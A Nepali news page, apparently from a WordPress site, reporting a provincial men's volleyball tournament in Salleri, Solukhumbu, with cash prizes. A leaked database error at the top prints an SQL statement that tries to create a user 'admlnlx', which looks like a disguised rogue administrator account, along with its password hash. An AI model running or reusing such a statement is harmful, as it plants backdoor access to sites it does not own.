WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA1o0SwMcYWUJU5SWKNCi1K9xsKYmh0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:45:13', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सल्लेरिमा प्रदेश स्तरीय पुरुष भलिबल प्रतियोगिता सञ्चालन हुने भएको छ । मदन भण्डारी स्पोर्टस एकेडेमी प्रदेश १ को आयोजनामा फागुण ६ गतेदेखि १० गतेसम्म प्रतियोगिता सञ्चालन हुने भएको हो ।
मदन भण्डारी स्पोर्टस एकेडेमी सोलुखुम्बुको व्यवस्थापनमा योङ्ग स्टार क्लव दोर्पू बजारको खेल मैदानमा हुने प्रतियोगितामा प्रदेश १ को १४ जिल्लाको टिमको सहभागिता रहने मदन भण्डारी स्पोर्टस एकेडेमी सोलुखुम्बुका अध्यक्ष दिपक राजभण्डारीले जानकारी दिए ।
नेपाल पर्यटन भ्रमण बर्ष २०२० लाई सघाउ पुर्याउने उद्देश्यले उक्त भलिबल आयोजना गरिएको अध्यक्ष भण्डारीले बताए । उक्त प्रतियोगिताको बिजेताले क्रमशः एक लाख पचास हजार, एक लाख र पचास हजार नगद पुरस्कार प्रमाण पत्र, मेडल पाउने आयोजकले जनाएको छ ।